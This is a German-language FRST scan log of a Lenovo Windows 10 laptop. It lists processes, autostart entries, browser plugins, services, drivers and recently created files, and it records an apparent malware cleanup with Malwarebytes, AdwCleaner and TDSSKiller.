(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(WIBU-SYSTEMS AG) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
(Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Updater\Updater.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe
(Synaptics Incorporated) C:\Windows\System32\valWbioSyncSvc.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Lenovo.) C:\Windows\System32\LPlatSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynFP\Shared\SensorDBSynch.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tposd.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Synaptics) C:\Program Files\Synaptics\SynTP\SynLenovoHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1804432 2015-12-22] (NVIDIA Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [3486520 2017-06-26] (Dropbox, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [477064 2013-12-22] (Autodesk Inc.)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PrivacyIconClient.exe [1178912 2016-02-25] (Intel Corporation)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodeMeter Control Center.lnk [2016-02-23]
ShortcutTarget: CodeMeter Control Center.lnk -> C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeterCC.exe (WIBU-SYSTEMS AG)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Netzwerk Server.lnk [2016-02-23]
ShortcutTarget: Netzwerk Server.lnk -> C:\Program Files (x86)\WIBUKEY\Server\WkSvMgr.exe (WIBU-SYSTEMS AG)
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{870c603a-60f8-4e24-9690-e4821fe96d21}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e862264f-fb30-45d1-a3f9-1bf499d21b67}: [DhcpNameServer] 192.168.2.1
Internet Explorer:
==================
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.netflix.com/
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2016-02-23] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2016-02-23] (Oracle Corporation)
FireFox:
========
FF DefaultProfile: pnaz2so4.default
FF ProfilePath: C:\Users\ararat\AppData\Roaming\Mozilla\Firefox\Profiles\pnaz2so4.default [2017-07-05]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [576904 2013-12-22] (Autodesk Inc.)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [49992 2017-06-26] (Dropbox, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373744 2016-11-02] (Intel Corporation)
R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [57160 2017-06-05] (Lenovo Group Limited)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [974632 2016-02-19] (Intel(R) Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [209184 2016-02-25] (Intel Corporation)
R2 Lenovo Instant On; C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe [3124808 2017-04-28] (Lenovo Group Limited)
R2 LPlatSvc; C:\WINDOWS\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-06-02] (Lenovo)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S4 McNeelUpdate; C:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [68192 2013-12-07] (Robert McNeel & Associates)
S3 mi-raysat_3dsmax2015_64; C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe [86016 2011-09-15] () [Datei ist nicht signiert]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2017-02-13] ()
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-01] (NVIDIA Corporation)
R2 NVWMI; C:\Windows\system32\nvwmi64.exe [3180176 2015-12-22] ()
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [259176 2016-10-03] (Synaptics Incorporated)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10351856 2016-12-15] (TeamViewer GmbH)
R2 valWBFPolicyService; C:\WINDOWS\system32\valWBFPolicyService.exe [86544 2016-07-13] (Synaptics Incorporated)
R2 valWbioSyncSvc; C:\WINDOWS\system32\valWbioSyncSvc.exe [56848 2016-07-13] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3743648 2017-02-13] (Intel® Corporation)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 blackberryncm; C:\WINDOWS\System32\drivers\blackberryncm6_AMD64.sys [36360 2016-04-06] (BlackBerry)
R3 e1dexpress; C:\WINDOWS\system32\DRIVERS\e1d62x64.sys [519680 2015-12-08] (Intel Corporation)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [244744 2017-04-13] (Intel Corporation)
R0 IntelHSWPcc; C:\WINDOWS\System32\drivers\IntelPcc.sys [88256 2015-06-09] (Intel Corporation)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [253856 2017-07-05] (Malwarebytes)
S3 NETwNs64; C:\WINDOWS\System32\drivers\Netwsw02.sys [3422472 2015-12-25] (Intel Corporation)
R3 Netwtw04; C:\WINDOWS\system32\DRIVERS\Netwtw04.sys [7630072 2017-03-21] (Intel Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvlddmkm.sys [14456920 2017-05-18] (NVIDIA Corporation)
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [423128 2013-07-24] (Realsil Semiconductor Corporation)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51296 2016-10-03] (Synaptics Incorporated)
R1 SMIDriver; C:\WINDOWS\system32\DRIVERS\smi.sys [39488 2016-07-13] (Synaptics Incorporated)
R3 SPUVCbv; C:\WINDOWS\System32\Drivers\SPUVCbv64.sys [749640 2016-07-01] (Sunplus Innovation Technology Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-07-05 21:31 - 2017-07-05 21:31 - 00014389 _____ C:\Users\ararat\Desktop\FRST.txt
2017-07-05 21:31 - 2017-07-05 21:31 - 00001407 _____ C:\Users\ararat\Desktop\mbam.txt
2017-07-05 21:30 - 2017-07-05 21:30 - 00000000 ____H C:\ProgramData\cm-lock
2017-07-05 21:27 - 2017-07-05 21:30 - 00253856 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-07-05 21:27 - 2017-07-05 21:27 - 00001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-07-05 21:27 - 2017-07-05 21:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-07-05 21:27 - 2017-07-05 21:27 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-07-05 21:27 - 2017-07-05 21:27 - 00000000 ____D C:\Program Files\Malwarebytes
2017-07-05 21:27 - 2017-06-27 12:06 - 00077376 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-07-05 21:22 - 2017-07-05 21:24 - 00000000 ____D C:\AdwCleaner
2017-07-05 21:22 - 2017-07-05 21:17 - 04110280 _____ C:\Users\ararat\Desktop\AdwCleaner_6.047.exe
2017-07-05 21:19 - 2017-07-05 21:20 - 00001946 _____ C:\Users\ararat\Desktop\Fixlog.txt
2017-07-05 21:17 - 2017-07-05 21:18 - 65033984 _____ (Malwarebytes ) C:\Users\ararat\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.160-1.0.2251.exe
2017-07-05 21:17 - 2017-07-05 21:17 - 04110280 _____ C:\Users\ararat\Downloads\AdwCleaner_6.047.exe
2017-07-04 21:39 - 2017-07-04 21:39 - 00000000 ____D C:\Users\ararat\Desktop\FRST-OlderVersion
2017-07-04 21:35 - 2017-07-04 21:39 - 00283900 _____ C:\TDSSKiller.3.1.0.15_04.07.2017_21.35.13_log.txt
2017-07-04 21:34 - 2017-07-04 21:34 - 04922400 _____ (AO Kaspersky Lab) C:\Users\ararat\Downloads\tdsskiller.exe
2017-07-04 21:34 - 2017-07-04 21:34 - 04922400 _____ (AO Kaspersky Lab) C:\Users\ararat\Desktop\tdsskiller.exe
2017-07-03 23:53 - 2017-07-03 23:56 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2017-07-02 23:17 - 2017-07-05 21:19 - 00000000 ____D C:\Users\ararat\Desktop\Troja
2017-07-02 20:58 - 2017-07-05 21:31 - 00000000 ____D C:\FRST
2017-07-02 20:45 - 2017-07-04 21:39 - 02436096 _____ (Farbar) C:\Users\ararat\Desktop\FRST64.exe
2017-07-02 20:37 - 2017-07-02 20:37 - 02435584 _____ (Farbar) C:\Users\ararat\Downloads\FRST64.exe
2017-06-29 23:31 - 2017-06-29 23:32 - 00000000 ____D C:\Users\ararat\Desktop\3D Druck
2017-06-27 22:23 - 2017-06-27 22:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-06-27 21:01 - 2017-06-27 21:01 - 00000000 ____D C:\Users\ararat\AppData\Local\DBG
2017-06-26 12:27 - 2017-06-26 12:27 - 00049992 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2017-06-18 10:32 - 2017-06-18 10:32 - 02373944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WudfUpdate_01011.dll
2017-06-14 20:30 - 2017-06-03 12:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-06-14 20:30 - 2017-06-03 12:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-06-14 20:30 - 2017-06-03 12:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-06-14 20:30 - 2017-06-03 12:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-06-14 20:30 - 2017-06-03 12:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-06-14 20:30 - 2017-06-03 12:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2017-06-14 20:30 - 2017-06-03 12:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-06-14 20:30 - 2017-06-03 12:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-06-14 20:30 - 2017-06-03 12:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-06-14 20:30 - 2017-06-03 12:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-06-14 20:30 - 2017-06-03 12:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-06-14 20:30 - 2017-06-03 12:02 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-06-14 20:30 - 2017-06-03 12:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2017-06-14 20:30 - 2017-06-03 11:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-06-14 20:30 - 2017-06-03 11:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-06-14 20:30 - 2017-06-03 11:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-06-14 20:30 - 2017-06-03 11:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-06-14 20:30 - 2017-06-03 11:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-06-14 20:30 - 2017-06-03 11:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 02228120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01693600 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01458592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00848288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00846752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe
2017-06-14 20:30 - 2017-06-03 11:56 - 00844696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00697760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00672672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00399264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll
2017-06-14 20:30 - 2017-06-03 11:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-06-14 20:30 - 2017-06-03 11:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-06-14 20:30 - 2017-06-03 11:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-06-14 20:30 - 2017-06-03 11:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-06-14 20:30 - 2017-06-03 11:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2017-06-14 20:30 - 2017-06-03 11:21 - 01516448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll
2017-06-14 20:30 - 2017-06-03 11:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 03673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-06-14 20:30 - 2017-06-03 11:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-06-14 20:30 - 2017-06-03 11:12 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-06-14 20:30 - 2017-06-03 11:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-06-14 20:30 - 2017-06-03 11:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-06-14 20:30 - 2017-06-03 11:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-06-14 20:30 - 2017-06-03 11:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-06-14 20:30 - 2017-06-03 11:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe
2017-06-14 20:30 - 2017-06-03 11:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-06-14 20:30 - 2017-06-03 11:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-06-14 20:30 - 2017-06-03 11:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-06-14 20:30 - 2017-06-03 11:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-06-14 20:30 - 2017-06-03 11:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-06-14 20:30 - 2017-06-03 11:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-06-14 20:30 - 2017-06-03 11:03 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-06-14 20:30 - 2017-06-03 11:02 - 08245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
